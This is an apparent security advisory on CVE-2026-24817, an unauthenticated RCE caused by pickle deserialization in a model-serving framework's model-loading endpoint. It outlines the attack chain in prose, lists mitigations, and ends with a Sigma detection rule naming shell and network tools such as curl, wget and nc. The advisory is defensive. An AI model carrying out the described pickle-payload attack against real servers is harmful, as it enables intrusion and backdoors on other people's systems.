Published
- 2 min read
Critical RCE in Popular ML Model Serving Framework — CVE-2026-24817
A critical unauthenticated remote code execution (RCE) vulnerability has been identified in the model loading subsystem of a widely-deployed open-source ML model serving framework. The vulnerability stems from unsafe deserialization of model files using Python’s pickle module, allowing an attacker who can supply a crafted model file to achieve arbitrary code execution on the serving host.
Vulnerability Details
| Field | Detail |
|---|---|
| CVE | CVE-2026-24817 |
| CVSS Score | 9.8 (Critical) |
| Attack Vector | Network |
| Authentication | None required |
| User Interaction | None |
| Affected Component | Model loading endpoint |
| Exploit Available | Yes — public PoC |
Root Cause
The framework’s model loading endpoint accepts serialised model files in Python pickle format without validation or sandboxing. Pickle deserialization is inherently unsafe — a crafted pickle payload can invoke arbitrary Python code at deserialization time, effectively granting the attacker code execution in the context of the serving process.
This class of vulnerability has been well-documented in the ML security community since at least 2021, with Hugging Face explicitly warning against loading untrusted pickle files. Despite this, numerous frameworks and models continue to use pickle as a default serialization format.
Exploitation
A proof-of-concept exploit has been publicly disclosed. Exploitation requires the ability to submit a model file to the serving endpoint — in default configurations, this endpoint is unauthenticated and exposed on port 8080.
Observed attack chain:
- Attacker sends POST request to
/api/v1/models/loadwith a crafted pickle payload - Framework deserializes the payload during model registration
- Attacker’s code executes in the serving process — typically running as root or a service account
- Attacker establishes reverse shell or drops persistent backdoor
Active exploitation in the wild has been confirmed by multiple threat intelligence vendors, primarily targeting misconfigured cloud instances with the model serving port exposed to the internet.
Affected Versions
Versions prior to the patched release are affected. Consult the vendor advisory for the specific version range — patch notes reference “unsafe pickle loading in model registry endpoint.”
Mitigations
Immediate actions:
- Apply the vendor patch — the fix replaces pickle deserialization with
safetensorsfor model loading and adds authentication to the model registry endpoint. - Restrict network access — firewall the model serving port. It should never be exposed to the internet without authentication.
- Audit model sources — only load models from trusted, verified sources. Treat model files as executable code.
- Monitor for anomalous process spawning — look for child processes spawned by the ML serving process, particularly shells or network tools.
Detection (Sigma):
title: Suspicious Child Process from ML Model Serving Framework
logsource:
product: linux
category: process_creation
detection:
selection:
ParentImage|endswith: ['/python3', '/uvicorn', '/gunicorn']
Image|endswith: ['/bash', '/sh', '/curl', '/wget', '/nc']
condition: selection
level: high